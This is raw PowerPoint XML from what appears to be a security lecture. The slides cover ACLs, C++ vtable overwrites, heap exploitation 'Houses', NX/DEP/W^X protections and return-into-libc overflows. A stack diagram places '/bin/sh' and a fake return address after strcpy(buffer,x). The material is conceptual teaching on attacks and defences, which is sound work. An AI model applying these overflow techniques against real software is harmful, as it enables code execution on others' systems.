              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getfacl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A directory or file with ACLs has a ”+” at the end of the permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extended attributes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional attributes that can be set</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Extended attributes are set/read with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>setfattr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>getfattr</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Four possible name spaces: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user, trusted, security, system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301021343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dirty="0"/>
              <a:t>Overwriting C++ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vtables</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1081347" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>C++ objects are allocated on the heap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Each object is associated with virtual function table pointer (vfptr), which points to the current definition of the object’s methods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>A variable overflow can be used to overwrite the vfptr so that it points to an area specified by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>When a method is invoked the attacker’s code is executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387495024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B244-F2B0-0C23-DE84-1F697C1302F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="205979"/>
            <a:ext cx="8229600" cy="857250"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many Houses of Heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D14DEF63-D99B-281D-4C84-E4276E9748E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1200150"/>
            <a:ext cx="8229600" cy="3753890"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are many ways in which to exploit heap memory corruption</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How2Heap: Source of example, tools, resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/shellphish/how2heap</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Techniques are often referred to as “Houses”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Comes from the 2005 paper: “The Malloc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Maleficarum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Glibc Malloc Exploitation Techniques” (whose name comes from the 1486 treatise: “Malleus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Maleficarum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Prime</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Mind</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Force</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Lore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>House of Spirit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>House of Chaos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5080127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Corruption Protections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevention</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Write decent programs! (impossible)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a language that performs boundary checking and does not allow pointer arithmetic (e.g., Java or Python)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform analysis of the program before execution (static analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Make exploitation harder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform checks on the program during execution (dynamic analysis)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect “write and execute” action sequences</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity checking (e.g., return address integrity checks, CFI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24682884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Continuous arms race: we will follow a semi-historical approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Step 1: Non-executable stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22831370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Stack Protection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to avoid execution of code on the stack, Linux leverages the NX bit </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires that the kernel uses the Physical Address Extension mode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The NX bit marks a memory area as Non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>eXecutable</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2792437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dirty="0"/>
              <a:t>DEP and W^X</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1226755" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data Execution Prevention (DEP) is Microsoft’s implementation of the NX mechanism</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It supports the NX bit in hardware if present, or it emulates the mechanism if missing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>W^X (W </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> X) is a security feature of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OpenBDS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forces pages to be either executable or writable but not both</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="46203057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Non-Executable Memory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The idea behind the NX bit (W^X/DEP) is to never have memory that is both writable and executable at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certain applications, like JIT-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> interpreters, might require this feature</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80142925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t>Return-into-libc Overflows</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199107" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If the stack is protected from execution, the overflow can be used to set a fake call frame that will be invoked when ret is executed by the currently executing function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Any function that is currently linked can be executed </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Often </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The attacker needs to be able to locate the address of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Debugger, /proc/maps</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="76404802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1" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="24003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2183" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="21145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2184" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="533400" y="268605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2185" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="342900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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202186" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="533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7" name="Line 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438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8" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2438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9" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="533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98" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="24003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2199" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="21145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2200" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="268605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2201" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="342900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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202202" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2819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3" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724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4" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4724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5" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2819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6" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="18288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fake caller return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202207" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="15430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a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/bin/sh0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202208" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="4171951"/>
            <a:ext cx="1852340" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>pop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Hack"/>
              <a:cs typeface="Hack"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202211" name="Text Box 35"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1447800" y="4229101"/>
            <a:ext cx="2408231" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>buffer,x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202212" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4800600" y="2228850"/>
            <a:ext cx="762000" cy="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2213" name="Text Box 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876801" y="2228850"/>
            <a:ext cx="1070951"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Stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
